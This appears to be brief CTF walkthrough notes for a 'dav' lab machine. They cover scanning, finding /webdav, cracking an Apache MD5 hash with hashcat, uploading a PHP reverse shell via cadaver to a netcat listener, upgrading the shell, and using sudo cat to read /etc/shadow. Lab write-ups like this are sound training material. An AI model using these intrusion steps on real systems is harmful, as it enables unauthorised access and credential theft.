dav

YouTube Walkthrough

rustscan

• 80
• Apache/2.4.18

feroxbuster

• /webdav

Try: Burpsuite - bruteforce basic http auth

Search - webdav default credentials ^

• w*****:x*****

hashid $hash

Try: MD5(APR) or Apache MD5 ^

• hashcat -m 1600 hash.txt $rockyou.txt

cadaver <http://$ip/webdav> ^

• revshell = shell.php
• put shell.php
• nc -lnvp $port
• http://$ip/webdav/shell.php

Upgrade Shell

• python3 -c "import pty; pty.spawn('/bin/bash')"
• [CTRL+Z]
• stty raw -echo;fg
• export TERM=xterm

PrivEsc ^

• sudo -l = /bin/cat
• cat /etc/shadow
• cat /root/root.txt